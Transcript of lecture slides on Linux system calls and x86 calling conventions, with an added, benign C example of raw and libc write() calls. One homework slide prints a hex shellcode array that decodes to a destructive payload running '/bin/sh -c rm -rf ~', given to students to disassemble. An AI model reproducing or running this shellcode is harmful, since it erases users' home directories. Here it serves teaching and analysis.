System Calls, C Library Functions - PowerPoint PPT Presentation

Description:

What happens if a function requires more parameters than you have registers? What if a parameter won't fit in a register? An entire struct, for example? ... – PowerPoint PPT presentation

Number of Views:43
Avg rating:3.0/5.0
Slides: 24
Provided by: Chris9
Transcript and Presenter's Notes

1
System Calls, C Library Functions
  • LCDR Eagle

2
Homework Review
  • Uppercase
  • Aitel email
  • Shellcode

3
Aitel Email
  • Program received signal SIGTRAP, Trace/breakpoint trap.
  • [Switching to Thread 1116941248 (LWP 17453)]
  • 0x080edf41 in ?? ()
  • (gdb) x/10xw $eip
  • 0x80edf41: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  • 0x80edf51: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  • 0x80edf61: 0xcccccccc 0xcccccccc

4
Shellcode
  • unsigned char linux_shellcode[] = /* contributed by antiNSA */
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
    "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
    "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
    "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
    "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
    "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
    "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
    "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
    "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
    "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
    "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
    "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
    "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
    "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
    "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
    "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
    "\x80\x31\xdb\x31\xc0\x40\xcd\x80";

5
Compile It
  • Compile the code with the debugging switch -g
  • gcc -o exploit -g exploit.c
  • Load it into gdb
  • gdb exploit
  • Disassemble the program at the location of the
    string
  • disassemble shellcode

6
System Calls
  • Operating system services are exposed via the
    "system call" mechanism
  • System calls represent the assembly language
    interface to the operating system
  • The C/C++ libraries simply provide a C function
    call interface to the Linux system calls

7
Linux System Calls
  • Invoked using an int 0x80
  • This is a software interrupt
  • Transfers control to the kernel
  • Transitions to kernel stack so we can't pass our
    parameters on the stack
  • Parameters placed into various CPU registers

8
Linux System Calls (ii)
  • There are about 190 different system calls
  • But there is only one int 0x80
  • Specify which system call you wish to make by
    placing the syscall number into eax before
    executing int 0x80
  • Not well documented
  • http://www.linuxassembly.org/syscall.html

9
Linux System Calls (iii)
  • A system call is essentially a call to a kernel
    function
  • Like a function call, each system call expects
    zero or more parameters
  • System calls expect their parameters in very
    specific registers

10
Linux System Calls (iv)
  • Syscall parameters (if necessary):
  • ebx: first parameter
  • ecx: second parameter
  • edx: third parameter
  • esi: fourth parameter
  • edi: fifth parameter
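The following C program is an added example (not from the slides) that makes the write system call the way slides 7 to 10 describe and puts it next to the libc wrapper that slide 6 says is "simply" a C interface to the same call. It assumes a Linux host with glibc. When built as 32-bit code (gcc -m32) the raw path is the int 0x80 convention from the slides, eax holding the syscall number (4 for write on i386) and ebx, ecx, edx holding the three arguments; on any other build it falls back to glibc's syscall() function, which marshals the host ABI's registers. The sample message and the pipe round-trip are constructed for the example. Two details a practitioner should take from it: the kernel returns failures as a negative errno value in eax while the libc wrapper returns -1 and sets errno, and syscall numbers are not portable across ABIs (write is 4 on i386 but 1 on x86-64), so SYS_write from sys/syscall.h is used instead of a hardcoded number in the portable path.

```c
/* Added example (not from the slides): the write(2) system call made raw
 * and through the C library, to show that libc only wraps the register
 * interface the slides describe.
 *
 * Assumptions: Linux host with glibc. On a 32-bit build the raw path is
 * int 0x80 with eax/ebx/ecx/edx as on slides 7 and 10; otherwise it falls
 * back to glibc's syscall(), which marshals the host ABI's registers.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* glibc declares syscall() in <unistd.h>; the prototype is repeated here so
 * the example compiles even under strict -std= flags that hide it. */
extern long syscall(long number, ...);

/* Raw write: returns eax exactly as the kernel left it. A failure comes back
 * as a small negative number (-errno); nothing sets the C-level errno. */
static long raw_write(int fd, const void *buf, unsigned long len)
{
#if defined(__i386__)
    long ret;
    /* eax = syscall number (write is 4 on i386), ebx = fd, ecx = buffer,
     * edx = length, then int 0x80. */
    __asm__ volatile ("int $0x80"
                      : "=a" (ret)
                      : "a" (4), "b" (fd), "c" (buf), "d" (len)
                      : "memory");
    return ret;
#else
    /* SYS_write is the number for *this* ABI (1 on x86-64, 4 on i386). */
    long ret = syscall(SYS_write, fd, buf, len);
    return ret < 0 ? -errno : ret;   /* hand back the kernel-style result */
#endif
}

/* Write a constructed message through a pipe with the raw call and read it
 * back with the libc wrapper. Returns the number of bytes that round-tripped
 * intact, or -1 on any failure. */
long raw_write_roundtrip(void)
{
    static const char msg[] = "hello via int 0x80\n";   /* constructed sample */
    int fds[2];
    char back[64] = {0};
    long n;

    if (pipe(fds) != 0)
        return -1;
    n = raw_write(fds[1], msg, sizeof msg - 1);
    if (n != (long)(sizeof msg - 1)) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (read(fds[0], back, sizeof back) != n || memcmp(back, msg, (size_t)n) != 0)
        n = -1;
    close(fds[0]);
    close(fds[1]);
    return n;
}

/* Error reporting differs between the two layers: the kernel returns -EBADF
 * in eax, while libc's write() returns -1 and stores EBADF in errno. */
long raw_write_bad_fd(void)
{
    return raw_write(-1, "x", 1);           /* -EBADF, i.e. -9 */
}

int libc_write_bad_fd(void)
{
    errno = 0;
    if (write(-1, "x", 1) != -1)
        return 0;
    return errno;                           /* EBADF */
}

int main(void)
{
    printf("round-tripped %ld bytes\n", raw_write_roundtrip());
    printf("raw write to fd -1 returned %ld; libc reported errno %d (EBADF is %d)\n",
           raw_write_bad_fd(), libc_write_bad_fd(), EBADF);
    return 0;
}
```

Build with gcc -m32 to exercise the int 0x80 path on a 64-bit machine (the 32-bit development libraries must be installed); without -m32 the program still runs and demonstrates the same two points through syscall().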

11
Useful System Calls
12
Why Use Syscalls
  • No need for libraries
  • Smallest fastest code
  • Often used in shell code
  • No need to link to libraries
  • Windows does not use syscalls
  • Windows shell code is more difficult to write

13
Parameter Passing
  • Many functions require parameters
  • You may pass parameters around any way you see
    fit
  • For example
  • You could write a function that expects two
    parameters and requires the caller to place them
    in EAX and EBX
  • As long as you know what your function expects,
    you will be able to call it

14
Parameter Passing (ii)
  • A good idea to be consistent across functions
  • Problems
  • What happens if a function requires more
    parameters than you have registers?
  • What if a parameter won't fit in a register?
  • An entire struct, for example?
  • How to deal with recursion?
  • How will other programmers know how to call your
    functions?

15
Calling Conventions (i)
  • Compiler writers have already dealt with all of
    these issues
  • Particularly the many parameters and recursion
    problem
  • By defining and adhering to calling conventions
  • We can interface to a wider variety of code
  • Others can interface to our code

16
Using C/C++ Libraries
  • Wider range of functions available
  • Less system dependent
  • Linux syscalls clearly only work on Linux systems
  • Must understand C/C++ calling conventions
  • How to pass parameters
  • Where to expect return
  • How to clean up the stack

17
Calling Conventions (ii)
  • Vary by compiler
  • Visual C++
    • cdecl
      • Push parameters right to left
      • Caller cleans up stack
    • stdcall
      • Push parameters right to left
      • Called function cleans up stack
    • fastcall
      • First two parameters (on the left) go in ECX and
        EDX
      • Remaining parameters are pushed right to left
    • thiscall
      • For C++ non-static member functions, this is
        placed in ECX

18
Calling Conventions (iii)
  • gcc
    • Supports cdecl and stdcall
    • cdecl is the default
  • g++
    • Uses thiscall for non-static member functions

19
Other Considerations
  • Where to expect return values?
    • Generally returned in EAX
    • 64-bit values in EDX:EAX
  • Preserving registers
    • gcc expects a function to preserve the contents
      of some registers across a function call
    • EBX, EDI, ESI, EBP
    • push msg
      call printf
      add esp, 4    ; eax, ecx, edx may have changed

20
Calling a C Function
  • Knowing calling convention and required
    parameters, you can call C functions from
    assembly
  • section .data
  • format db 'X %s',0xA,0
  • section .text
  • push eax
  • push format
  • call printf
  • add esp, 8

21
Using C/C++ Libraries
  • Must link your object file (assembled source
    file) to the libraries you wish to use
  • I find it easiest to let gcc do this for me
  • BUT! gcc wants to add a _start function for
    library initialization prior to calling main
  • So, you better not name your entry point _start
  • Name it main to make gcc happy

22
Example
  • section .data                   ; section declaration
  • msg db "Hello, world!",0x0a,0   ; our string
  • section .text                   ; section declaration
  • global main                     ; allow gcc to find our function
  • extern printf                   ; tell nasm about functions we wish
                                    ; to call
  • extern exit
  • main:
  • ; write our string to stdout
  • push msg                        ; parameter to printf
  • call printf
  • pop eax                         ; clean up the stack
  • ; and exit
  • xor eax,eax                     ; return value of zero
  • push eax                        ; parameter to exit
  • call exit

23
Running It
  • Assemble and link the example as follows
  • nasm -f elf hello_main.asm
  • gcc -o hello_main hello_main.o